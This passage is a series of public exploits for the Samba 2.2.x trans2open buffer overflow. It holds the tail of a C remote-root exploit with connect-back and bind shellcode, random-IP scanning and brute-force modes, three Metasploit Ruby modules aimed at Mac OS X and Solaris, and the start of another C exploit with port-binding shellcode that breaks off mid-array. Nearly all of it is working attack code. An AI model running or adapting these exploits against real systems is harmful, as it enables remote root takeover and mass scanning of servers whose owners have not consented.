0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x2E); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x73; /* session setup */ smbheader->flags = 0x08; /* caseless pathnames */ smbheader->flags2 = 0x01; /* long filenames supported */ smbheader->pid = getpid() & 0xFFFF; smbheader->uid = 100; smbheader->mid = 0x01; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); memset(buffer, 0x00, sizeof(buffer)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x3C); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x70; /* start connection */ smbheader->pid = getpid() & 0xFFFF; smbheader->tid = 0x00; smbheader->uid = 100; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) return -1; return 0; } int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x90; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer + 1099 + i, &dummy, 4); memcpy(buffer + 1103 + i, &ret, 4); } memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1800, shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x30; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1127, &ret, 4); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int main (int argc,char *argv[]) { char *shellcode = NULL; char scan_ip[256]; int brute = -1; int connectback = 0; int force = 0; int i = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; int opt = 0; int port = 139; int random = 0; int scan = 0; int sock = 0; int sock2 = 0; int status = 0; int type = 0; int verbose = 0; unsigned long BRUTE_DELAY = 100000; unsigned long ret = 0x0; unsigned long MAX_CHILDS = 40; unsigned long STEPS = 300; struct hostent *he; fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n" "--------------------------------------------------------------\n"); while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { switch(opt) { case 'b': brute = atoi(optarg); if ((brute < 0) || (brute > 3)) { fprintf(stderr, "Invalid platform.\n\n"); return -1; } break; case 'B': STEPS = atoi(optarg); if (STEPS == 0) STEPS++; break; case 'c': sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); connectback = 1; if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { fprintf(stderr, "Invalid IP address.\n\n"); return -1; } linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1; linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2; linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3; linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4; break; case 'C': MAX_CHILDS = atoi(optarg); if (MAX_CHILDS == 0) { fprintf(stderr, "Invalid number of childs.\n"); return -1; } if (MAX_CHILDS > 99) { fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } break; case 'd': BRUTE_DELAY = atoi(optarg); break; case 'f': force = 1; break; case 'p': port = atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr, "Invalid port.\n\n"); return -1; } break; case 'r': ret = strtoul(optarg, &optarg, 16); break; case 's': random = 1; scan = 1; break; case 'S': random = 0; scan = 1; sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3); ip3--; break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { for(i = 0; i < sizeof(targets) / 16; i++) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type, (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } break; case 'v': verbose = 1; break; default: usage(argv[0] == NULL ? "sambal" : argv[0]); break; } } if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? "sambal" : argv[0]); if (scan == 1) fprintf(stdout, "+ Scan mode.\n"); if (verbose == 1) fprintf(stdout, "+ Verbose mode.\n"); if (scan == 1) { srand(getpid()); while (1) { if (random == 1) { ip1 = rand() % 255; ip2 = rand() % 255; ip3 = rand() % 255; } else { ip3++; if (ip3 > 254) { ip3 = 1; ip2++; } if (ip2 > 254) { ip2 = 1; ip1++; } if (ip1 > 254) exit(0); } for (ip4 = 0; ip4 < 255; ip4++) { i++; snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: fprintf(stdout, "+ [%s] Samba\n", scan_ip); break; case 1: fprintf(stdout, "+ [%s] Windows\n", scan_ip); break; default: break; } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } he = gethostbyname(argv[optind]); if (he == NULL) { fprintf(stderr, "Unable to resolve %s...\n", argv[optind]); return -1; } if (brute == -1) { if (ret == 0) ret = targets[type - 1].ret; shellcode = targets[type - 1].shellcode; if (connectback == 1) { fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { case 0: /* linux */ shellcode = linux_connect_back; break; case 1: /* FreeBSD/NetBSD */ shellcode = bsd_connect_back; break; case 2: /* OpenBSD */ shellcode = bsd_connect_back; break; case 3: /* OpenBSD 3.2 Non-exec stack */ shellcode = bsd_connect_back; break; } } if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); if (targets[type - 1].os_type != 2) { if (exploit_normal(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } sleep(2); if (connectback == 0) { if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n"); return -1; } fprintf(stdout, "--------------------------------------------------------------\n"); shell(sock2); close(sock); close(sock2); } else { fprintf(stdout, "+ Done...\n"); close(sock2); close(sock); } return 0; } signal(SIGPIPE, SIG_IGN); signal(SIGUSR1, handler); switch(brute) { case 0: if (ret == 0) ret = 0xc0000000; shellcode = linux_bindcode; fprintf(stdout, "+ Bruteforce mode. (Linux)\n"); break; case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n"); break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n"); break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n"); break; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); for (i = 0; i < 100; i++) childs[i] = -1; i = 0; if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } while (OWNED == 0) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); } else { ret -= STEPS; i++; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) if (verbose == 1) fprintf(stderr, "+ socket() error.\n"); if ((ret & 0xff) == 0x00 && brute != 3) ret++; if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret); usleep(BRUTE_DELAY); switch (childs[i] = fork()) { case 0: if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) { if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if(write_timer(sock, 3) == 1) { if (start_session(sock) < 0) { if (verbose == 1) fprintf(stderr, "+ Session failed.\n"); if (sock > 2)close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (brute == 3) { if (exploit_openbsd32(sock, ret, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } } else { if (exploit_normal(sock, ret, shellcode) < 0) { if (verbose == 1) fprintf(stderr, "+ Failed.\n"); if (sock > 2) close(sock); if (sock2 > 2) close(sock2); exit(-1); } if (sock > 2) close(sock); if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { if (sock2 > 2) close(sock2); exit(-1); } if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { if (sock2 > 2) close(sock2); kill(getppid(), SIGUSR1); } exit(1); } exit(0); break; case -1: fprintf(stderr, "+ fork() error\n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } // milw0rm.com [2003-04-10]

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Samba trans2open Overflow (Mac OS X)', 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems. }, 'Author' => [ 'hdm' ], 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0201'], [ 'OSVDB', '4469'], [ 'BID', '7294'], [ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'], ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'MinNops' => 512, }, 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Targets' => [ ['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ], ], 'DisclosureDate' => 'Apr 7 2003', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(139) ], self.class) end # Need to perform target detection def autofilter false end def exploit curr_ret = target['Rets'][0] while (curr_ret >= target['Rets'][1]) break if session_created? begin print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login # 1988 is required for findrecv shellcode pattern = rand_text_english(1988) # This stream covers the framepointer and the return address pattern[1195, 64] = [curr_ret].pack('N') * 16 # Stuff the shellcode into the request pattern[3, payload.encoded.length] = payload.encoded trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern sock.put(trans) handler disconnect rescue EOFError rescue => e print_status("Caught exception: #{e}") break end curr_ret -= target['Rets'][2] end end end

## # $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba trans2open Overflow (Mac OS X PPC)', 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems. }, 'Author' => [ 'hdm', 'jduck' ], 'Version' => '$Revision: 9571 $', 'References' => [ [ 'CVE', '2003-0201' ], [ 'OSVDB', '4469' ], [ 'BID', '7294' ], [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'MinNops' => 512, }, 'Platform' => 'osx', 'Arch' => ARCH_PPC, 'Targets' => [ [ 'Samba 2.2.x - Bruteforce', { # Not necessary on PPC # 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack 'Offset' => 1195, 'Bruteforce' => { 'Start' => { 'Ret' => 0xbffffdfc }, 'Stop' => { 'Ret' => 0xbfa00000 }, 'Step' => 512 } } ] ], 'DisclosureDate' => 'Apr 7 2003', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(139) ], self.class) end # Need to perform target detection def autofilter false end def brute_exploit(addrs) curr_ret = addrs['Ret'] begin print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login # 1988 is required for findrecv shellcode pattern = rand_text_english(1988) # This stream covers the framepointer and the return address off = target['Offset'] pattern[off, 64] = [curr_ret].pack('N') * 16 # Stuff the shellcode into the request pattern[3, payload.encoded.length] = payload.encoded trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern sock.put(trans) handler disconnect rescue EOFError rescue => e print_error("#{e}") end end end

## # $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'Samba trans2open Overflow (Solaris SPARC)', 'Description' => %q{ This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module. }, 'Author' => [ 'hdm', 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9571 $', 'References' => [ [ 'CVE', '2003-0201' ], [ 'OSVDB', '4469' ], [ 'BID', '7294' ], [ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ] ], 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'MinNops' => 512, }, 'Platform' => 'solaris', 'Targets' => [ [ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce', { 'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack 'Offset' => 1103, 'Bruteforce' => { 'Start' => { 'Ret' => 0xffbffaf0 }, 'Stop' => { 'Ret' => 0xffbfa000 }, 'Step' => 128 } } ], [ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce', { 'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack 'Offset' => 1103, 'Bruteforce' => { 'Start' => { 'Ret' => 0xffbefaf0 }, 'Stop' => { 'Ret' => 0xffbea000 }, 'Step' => 128 } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2003' )) register_options( [ Opt::RPORT(139) ], self.class) end def brute_exploit(addrs) curr_ret = addrs['Ret'] begin print_status("Trying return address 0x%.8x..." % curr_ret) connect smb_login # # The obstacle course: # outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize); # smb_dump(smb_fn_name(type), 0, outbuf, outsize); # return(outsize); # # This value *must* be 1988 to allow findrecv shellcode to work pattern = rand_text_english(1988) # # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u # # Patch the overwritten heap pointers # substr($pattern, 1159, 4, pack('N', $target->[4])); # substr($pattern, 1163, 4, pack('N', $target->[4])); # # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0 # substr($pattern, 1195, 4, pack('N', 0xffffffff)); # # Fix the frame pointer (need to check for null in address) # substr($pattern, 1243, 4, pack('N', $target->[3]-64)); # # Finally set the return address # substr($pattern, 1247, 4, pack('N', $curr_ret)); # # # This method is more reliable against a wider range of targets # off = target['Offset'] ptr_to_non_zero = target['PtrToNonZero'] # Local variable pointer patches for early versions of 2.2.x pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9 off += 36 # Overwrite heap pointers with a ptr to NULL at the top of the stack pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10 off += 40 # Patch the type index into the smb_messages[] array... # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0 pattern[off, 20] = [0xffffffff].pack('N') * 5 off += 20 # This stream covers the framepointer and the return address pattern[off, 400] = [curr_ret].pack('N') * 100 # Stuff the shellcode into the request pattern[3, payload.encoded.length] = payload.encoded trans = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+ "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+ pattern sock.put(trans) handler disconnect rescue EOFError rescue => e print_error("#{e}") end end end

// source: https://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. /* ** ** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD ** 11/Apr/2003 ** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. ** My World: http://x82.i21c.net & http://x82.inetcop.org ** */ /* ** -=-= POINT! POINT! POINT! POINT! POINT! =-=- ** ** source/smbd/trans2.c: ** ** line:205 static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize, ** line:206 char **pparams, int total_params, char **ppdata, int total_data) ** line:207 { ** [...] ** line:219 char *pname; ** line:220 int16 namelen; ** [...] ** line:222 pstring fname; // source/include/smb.h: ** // line:162 #define PSTRING_LEN 1024 ** // line:165 typedef char pstring[PSTRING_LEN]; ** [...] ** line:250 namelen = strlen(pname)+1; ** line:251 ** line:252 StrnCpy(fname,pname,namelen); // here. ** ** reply_trans2() function: ** ** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize) ** [...] ** line:3358 outsize = call_trans2open(conn, inbuf, outbuf, bufsize, ** line:3359 &params, total_params, &data, total_data); ** line:3360 END_PROFILE_NESTED(Trans2_open); ** line:3361 break; ** ** Visual point that change flowing of this program, ** happen after overwrited variables. ** ** Detailed information references digitaldefense's Advisory. ** ** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt ** ** Also, thank about eSDee's exploit that remind Samba application communication method. ** -- ** Thank you. ** */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> struct os { int num; char *ost; u_long shell; }; struct os plat[]= { { 0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x", /* v2.2.0 exploited successfully. (Brute-Force mode) v2.2.1a exploited successfully. (Brute-Force mode) v2.2.2 exploited successfully. (Brute-Force mode) v2.2.3 exploited successfully. (Default mode) v2.2.4 exploited successfully. (Default mode) v2.2.5 exploited successfully. (Default mode) v2.2.6 exploited successfully. (Default mode) v2.2.7 exploited successfully. (Default mode) v2.2.8 exploited successfully. (Default mode) */ 0xbfbff482 }, { 1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x", /* v2.2.0 exploited successfully. (Brute-Force mode) v2.2.1a exploited successfully. (Brute-Force mode) v2.2.2 exploited successfully. (Brute-Force mode) v2.2.3 exploited successfully. (Default mode) v2.2.4 exploited successfully. (Default mode) v2.2.5 exploited successfully. (Default mode) v2.2.6 exploited successfully. (Default mode) v2.2.7 exploited successfully. (Default mode) v2.2.8 exploited successfully. (Default mode) */ 0xdfbfd482 }, { 2,NULL,0 } }; char shellcode[]= /* 86bytes portbinding shellcode by bighawk */ "\x31\xc9" // xor ecx, ecx "\xf7\xe1" // mul ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x41" // inc ecx "\x51" // push ecx "\x51" // push ecx "\xb0\x61" // mov al, 97 "\xcd\x80" // int 80h "\x89\xc3" // mov ebx, eax "\x52" // push edx "\x66\x68\x27\x10" // push word 4135 "\x66\x51" // push cx "\x89\xe6" // mov esi, esp "\xb1\x10" // mov cl, 16 "\x51" // push ecx "\x56" // push esi "\x50" // push eax "\x50" // push eax "\xb0\x68" // mov al, 104 "\xcd\x80" // int 80h "\x51" // push ecx "\x53" // push ebx "\x53" // push ebx "\xb0\x6a" // mov al, 106 "\xcd\x80" // int 80h "\x52" // push edx "\x52" // push edx "\x53" // push ebx "\x53" // push ebx "\xb0\x1e" // mov al, 30 "\xcd\x80" // int 80h "\xb1\x03" // mov cl, 3 "\x89\xc3" // mov ebx, eax "\xb0\x5a" // mov al, 90 "\x49" // dec ecx "\x51" // push ecx "\x53" // push ebx "\x53" // push ebx "\xcd\x80" // int 80h "\x41" // inc ecx "\xe2\xf5" // loop-10 "\x51" // push ecx "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx "\x54" // push esp "\x53" // push ebx "\x53" // push ebx "\xb0\x3b" // mov al, 59 "\xcd\x80"; // int 80h #define BRUTE_AT (64) #define SH_PORT (10000) #define ATK_PORT (139) #define DF_NOP (0x41) #define __BUF_LEN (0x00000463) #define __LEN_PAD (0x0000012c) void banrl(); int re_connt(int sock,int type); void usage(char *p_name); int setsock(char *host,int port); void send_recv_sh(int sock); int __atk_code_send_recv(int sock,u_long shell); int __atk_code_send_recv(int sock,u_long shell) { int eat_buf_set=0,atk_buf_pos=0; char atk_buf[0x960+5]; char its_exploit_packet[]={ 0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42, 0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c, 0x00,0xd0,0x07,0x0c,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0, 0x07,0x43,0x00,0x0c,0x00,0x14,0x08,0x01, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x90, 0x00 }; char its_first_time_conn[]={ 0x00,0x00,0x00,0x2e,0xff,0x53,0x4d,0x42, 0x73,0x00,0x00,0x00,0x00,0x08,0x01,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x64,0x00,0x01,0x00,0x00,0xff,0x00,0x00, 0x00,0x00,0x20,0x02,0x00,0x01,0x00,0x00, 0x00,0x00 }; char its_second_time_conn[]={ 0x00,0x00,0x00,0x3c,0xff,0x53,0x4d,0x42, 0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x0c,0x20, 